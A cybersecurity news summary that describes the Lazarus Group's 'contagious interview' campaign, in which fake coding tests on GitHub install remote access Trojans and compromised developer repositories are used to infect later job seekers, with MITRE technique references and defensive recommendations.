North Korean Fake Job Scams Spread Malware via 'Contagious Interview'
North Korean operatives use a 'contagious interview' tactic, where a compromised developer's GitHub repo spreads RATs to other job seekers.
MITRE ATT&CK® TTPs (2)
Click any technique to view details on attack.mitre.org
Executive Summary
North Korean state-sponsored hackers are deploying a self-propagating social engineering campaign dubbed the 'contagious interview,' which uses a compromised developer's GitHub repository to infect other job seekers with remote access Trojans (RATs). According to researchers at Securonix, the Lazarus Group lures cryptocurrency and tech professionals with fake job offers, then weaponizes their own code to attack subsequent candidates, creating a worm-like infection chain.
Technical Analysis
The attack begins with a phishing email containing a malicious link, often disguised as a legitimate coding challenge or interview task hosted on a platform like GitHub. If a victim interacts with the repository—for example, by cloning it and running a provided script—malware is deployed. The primary payload is a remote access Trojan, such as RustBucket or KandyKorn, which establishes a backdoor. Crucially, the threat actors then compromise the victim's own GitHub account and repositories. They inject malicious code into the victim's projects, which are then presented as 'tests' to the next round of job applicants, automatically propagating the infection.
Tactics, Techniques & Procedures
The campaign employs several distinct techniques. Initial access is gained through spear-phishing (T1566) targeting professionals in the crypto and tech sectors. The attackers use fake identities and company personas to build credibility. After compromise, they abuse version control systems (T1199) by modifying a victim's GitHub repositories to host malicious payloads. Execution is achieved through user execution of malicious scripts (T1204). The self-propagating mechanism, where one victim's resources are used to attack the next, represents a software supply chain attack (T1195.002) and demonstrates a worm-like capability for lateral movement within a specific professional community.
Threat Actor Context
The activity is attributed to the Lazarus Group, a cyber espionage and financial crime unit operated by North Korea's Reconnaissance General Bureau. The group is known for high-value cryptocurrency thefts to fund the regime. This 'contagious interview' tactic represents an evolution of their social engineering playbook, moving beyond one-off compromises to create a sustainable, automated infection pipeline that reduces their direct involvement and leverages victims' trusted reputations.
Mitigations & Recommendations
Securonix recommends organizations, particularly in cryptocurrency and technology, train employees and contractors to scrutinize unsolicited job interviews and technical tests. Developers should verify the integrity of any code repository before execution, even if it appears to come from a known contact. Enforcing multi-factor authentication on all version control and development platform accounts can prevent account takeover. Security teams should monitor for unusual repository commits or the execution of unknown binaries from development environments.
Stay Updated
Get the latest cybersecurity news delivered to your inbox.
